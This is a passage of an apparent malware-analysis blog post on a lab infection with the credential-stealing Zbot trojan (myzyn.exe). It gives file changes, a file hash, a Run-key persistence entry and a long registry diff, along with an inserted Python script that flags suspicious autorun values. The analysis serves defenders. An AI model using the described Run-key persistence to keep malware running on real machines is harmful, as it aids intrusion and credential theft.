<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\SETUP_WM.EXE-3135CBD6.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">34KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:43 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WGSDGSDGDSGSD.EXE-058972B5.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">20KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:17 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WIRESHARK.EXE-0525E272.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">53KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:28:58 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\Prefetch\WMPLAYER.EXE-18DDEF9C.pf</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">59KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:34:04 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\d3d9caps.dat</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">1KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">9/22/2012 12:33:59 PM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">C:\WINDOWS\system32\wmpns.dll</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">222KB</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">A</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">4/14/2008 8:00:00 AM</span></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody></table>
<br />
The cookies were not created as part of the infection. One was from MSN.com (which opens by default in Windows XP), one was from URLquery.net, one was from a redirected site (my first attempt at infection), and the other was unrelated.<br />
<br />
The files C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\1864 and C:\Documents and Settings\bomber\Local Settings\Temp\hsperfdata_bomber\2424 were in "use" once the system was compromised, indicating that they were being used by the application. These files are created by Java for its temporary needs, and I have seen them on quite a few systems that were infected. More often, however, I have seen the folder hsperfdata_%username% empty post-infection.<br />
<br />
myzyn.exe is recognized as PWS-Zbot.<br />
<span style="background-color: white;"><br /></span>
<br />
<table style="background-color: white; border-collapse: collapse; border-spacing: 0px; color: #333333; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 13px; line-height: 18px; margin-bottom: 8px; margin-left: 8px; max-width: 100%; text-align: start;"><tbody>
<tr><td style="padding: 8px 10px 9px;">SHA256:</td><td style="padding: 8px 10px 9px;">0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199</td></tr>
<tr><td style="padding: 8px 10px 9px;">File name:</td><td style="padding: 8px 10px 9px;">myzyn.exe</td></tr>
<tr><td style="padding: 8px 10px 9px;">Detection ratio:</td><td class=" text-red " style="color: #b40c1a; padding: 8px 10px 9px;">28 / 43</td></tr>
<tr><td style="padding: 8px 10px 9px;">Analysis date:</td><td style="padding: 8px 10px 9px;">2012-09-22 17:42:05 UTC ( 43 minutes ago )</td></tr>
</tbody></table>
<span style="background-color: white;"><br /></span>
<br />
<div style="text-align: left;">
<a href="https://www.virustotal.com/file/0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199/analysis/1348335725/">https://www.virustotal.com/file/0236a656dff29bbdb5114b0c036dbae89ea4c8f68641c3a7bb0ebeb05c827199/analysis/1348335725/</a>
</div>
<div style="text-align: left;">
<br /></div>
<div style="text-align: center;">
<span style="font-size: large;">Now Onto the Registry</span></div>
<div style="text-align: center;">
<span style="font-size: large;"><br /></span></div>
<div style="text-align: left;">
Persistence was established through HKCU\Software\Microsoft\Windows\CurrentVersion\Run, nothing special here.</div>
<div style="text-align: left;">
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%px;"><tbody>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></td><td><span style="color: black; font-size: xx-small;">Orimdie</span></td><td></td><td><span style="color: black; font-size: xx-small;">""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td></tr>
</tbody></table>
</div>
<div style="text-align: left;">
<span style="font-size: large;"><br /></span></div>
Here is the full dump of the registry changes, which admittedly is contaminated by some legitimate Windows XP activity surrounding the first launch of some programs, like Windows Media Player, and my download of Java from oldversion.com, which was unexpected. I will use the lessons learned here in future studies.<br />
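One way to cut through that contamination when triaging a before/after registry report like the one below, as an added example that is not the author's tooling: parse the four-column table (Key, Value, Data Before, Data After) and surface only autorun values whose target sits under a user profile. The function names, the HKLM and RunOnce variants, and the ExampleUpdater row are assumptions made for illustration; the other sample rows reuse values shown in this post.

```python
import re
from html.parser import HTMLParser

# Constructed sample in the shape of the report table (Key, Value, Data Before,
# Data After). The first three data rows reuse values shown in the post; the
# last row is invented to show an autorun entry that should not be flagged.
SAMPLE_REPORT = r'''
<table><tbody>
<tr><th>Key</th><th>Value</th><th>Data Before</th><th>Data After</th></tr>
<tr><td><span>HKEY_CLASSES_ROOT\WMP.DeskBand</span></td><td><span>@</span></td><td></td><td><span>"Windows Media Player"</span></td></tr>
<tr><td><span>HKEY_CURRENT_USER\Identities</span></td><td><span>Identity Ordinal</span></td><td><span>dword:00000001</span></td><td><span>dword:00000002</span></td></tr>
<tr><td><span>HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run</span></td><td><span>Orimdie</span></td><td></td><td><span>""C:\Documents and Settings\bomber\Application Data\Feuw\myzyn.exe""</span></td></tr>
<tr><td><span>HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run</span></td><td><span>ExampleUpdater</span></td><td></td><td><span>"C:\Program Files\Example\updater.exe"</span></td></tr>
</tbody></table>
'''

# Autorun keys checked here. The post names only the HKCU Run key; the HKLM and
# RunOnce variants are an assumption added as the same class of location.
AUTORUN_KEY = re.compile(
    r"^HKEY_(CURRENT_USER|LOCAL_MACHINE)\\Software\\Microsoft\\Windows"
    r"\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)

# Any path below a user profile (XP layout as in the post, plus the later
# C:\Users layout). Searched anywhere in the command so that a profile path
# passed as an argument to another program is also caught.
PROFILE_PATH = re.compile(
    r"[A-Z]:\\(Documents and Settings|Users)\\[^\\]+\\", re.IGNORECASE)


class DiffTableParser(HTMLParser):
    """Collect every <tr> that has exactly four <td> cells as a tuple of text."""

    def __init__(self):
        super().__init__()
        self.rows = []
        self._row = None   # cells of the row being read, or None outside <tr>
        self._cell = None  # text fragments of the cell being read

    def handle_starttag(self, tag, attrs):
        if tag == "tr":
            self._row = []
        elif tag == "td" and self._row is not None:
            self._cell = []

    def handle_data(self, data):
        if self._cell is not None:
            self._cell.append(data)

    def handle_endtag(self, tag):
        if tag == "td" and self._cell is not None:
            self._row.append("".join(self._cell).strip())
            self._cell = None
        elif tag == "tr" and self._row is not None:
            # Header rows use <th>, so they end up with no cells and are skipped.
            if len(self._row) == 4:
                self.rows.append(tuple(self._row))
            self._row = None


def parse_report(html):
    """Return (key, value, before, after) tuples from the report HTML."""
    parser = DiffTableParser()
    parser.feed(html)
    parser.close()
    return parser.rows


def triage(rows):
    """Return one finding per autorun value that was added or changed."""
    findings = []
    for key, value, before, after in rows:
        # Skip non-autorun keys, key-creation rows (no value name), removed
        # values (no data after) and unchanged values.
        if not AUTORUN_KEY.match(key) or not value or not after or after == before:
            continue
        reasons = ["new autorun value" if not before else "autorun value modified"]
        if PROFILE_PATH.search(after):
            reasons.append("target under a user-writable profile directory")
        findings.append({
            "key": key,
            "value": value,
            # The report doubles the quotes around the command; strip them all.
            "target": after.strip().strip('"'),
            "reasons": reasons,
        })
    return findings


def suspicious(findings):
    """Keep findings with more than one reason, i.e. autorun plus profile path."""
    return [f for f in findings if len(f["reasons"]) > 1]


if __name__ == "__main__":
    for finding in suspicious(triage(parse_report(SAMPLE_REPORT))):
        print(finding["key"], finding["value"], finding["target"], finding["reasons"])
```

A target under the user profile is only a triage signal: some legitimate per-user software also starts from there, so each hit still needs the file itself checked.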
<br />
<br />
<br />
<br />
<b>backhole1 - Registry</b><br />
<br />
<table border="1" cellpadding="2" cellspacing="0" style="width: 100%px;">
<tbody>
<tr>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Key</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Value</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Data Before</span></th>
<th align="left" bgcolor="#00007F"><span style="color: white; font-size: xx-small;">Data After</span></th>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\WMP.DeskBand.1\CLSID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{0A4286EA-E355-44FB-8086-AF3DF7645BD9}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Windows Media Player"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\Implemented Categories\{00021492-0000-0000-C000-000000000046}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\InprocServer32</span></td>
<td><span style="color: black; font-size: xx-small;">ThreadingModel</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"Apartment"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\ProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand.1"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\CLSID\{0A4286EA-E355-44FB-8086-AF3DF7645BD9}\VersionIndependentProgID</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMP.DeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"IWMPDeskBand"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\ProxyStubClsid32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{00020424-0000-0000-C000-000000000046}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\Interface\{0A55922C-3B1F-469B-8D0D-B15060499A52}\TypeLib</span></td>
<td><span style="color: black; font-size: xx-small;">Version</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"1.0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\MIME\Database\Content Type\application/x-wmplayer</span></td>
<td><span style="color: black; font-size: xx-small;">CLSID</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"{cd3afa96-b84f-48f0-9393-7edc34128127}"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"WMPDeskBand 1.0 Type Library"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\0\win32</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\wmpband.dll"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\FLAGS</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"0"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CLASSES_ROOT\TypeLib\{B6DD1ED6-573F-40FD-99A1-F28D8BF23916}\1.0\HELPDIR</span></td>
<td><span style="color: black; font-size: xx-small;">@</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">"C:\PROGRA~1\WINDOW~2\"</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000002</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}</span></td>
<td><span style="color: black; font-size: xx-small;">Identity Ordinal</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">VerStamp</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
<td><span style="color: black; font-size: xx-small;">dword:00000003</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpellDontIgnoreDBCS</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">MSIMN</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">StoreMigratedV5</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">ConvertedToDBX</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Settings Upgraded</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000007</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Running</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Store Root</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex(2):25,55,73,65,72,50,72,6f,66,69,6c,65,25,5c,4c,6f,63,61,6c,20,53,65,74,74,69,6e,67,73,5c,41,70,70,6c,69,63,61,74,69,6f,6e,20,44,61,74,61,5c,49,64,65,6e,74,69,74,69,65,73,5c,7b,46,30,37,46,43,37,31,39,2d,31,38,45,42,2d,34,42,37,31,2d,38,31,30,43,2d,43,41,44,36,46,43,39,32,30,38,35,37,7d,5c,4d,69,63,72,6f,73,6f,66,74,5c,4f,75,74,6c,6f,6f,6b,20,45,78,70,72,65,73,73,5c,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerDlgPos</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:2c,00,00,00,00,00,00,00,01,00,00,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,b6,01,00,00,a9,00,00,00,9e,03,00,00,43,01,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">SpoolerTack</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0</span></td>
<td><span style="color: black; font-size: xx-small;">Compact Check Count</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Welcome Message</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000000</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Secure Safe Attachments</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00000001</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Mail</span></td>
<td><span style="color: black; font-size: xx-small;">Default_CodePage</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">dword:00006faf</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\News</span></td>
<td><span style="color: black; font-size: xx-small;">Accounts Checked</span></td>
<td></td>
<td><span style="color: black; font-size: xx-small;">hex:00,00,00,00,</span></td>
</tr>
<tr bgcolor="#FFFFFF"><td><span style="color: black; font-size: xx-small;">HKEY_CURRENT_USER\Identities\{F07FC719-18EB-4B71-810C-CAD6FC920857}\Software\Microsoft\Outlook Express\5.0\Rules</span></td>
<td></td>
<td></td>
<td></td>
</tr>
